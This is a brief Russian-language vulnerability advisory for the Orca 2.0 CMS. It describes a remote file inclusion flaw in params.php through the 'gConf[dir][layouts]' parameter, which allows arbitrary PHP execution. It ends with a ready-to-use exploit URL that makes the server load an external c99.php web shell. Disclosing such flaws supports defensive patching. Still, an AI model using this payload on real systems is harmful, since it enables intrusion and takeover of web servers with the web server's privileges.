Программа: Orca 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «gConf[dir][layouts]» сценарием params.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

http://127.0.0.1/cms/Orca-2.0.beta2/layout/default/params.php? gConf[dir][layouts]=http://127.0.0.1/c99.php?



Оставить мнение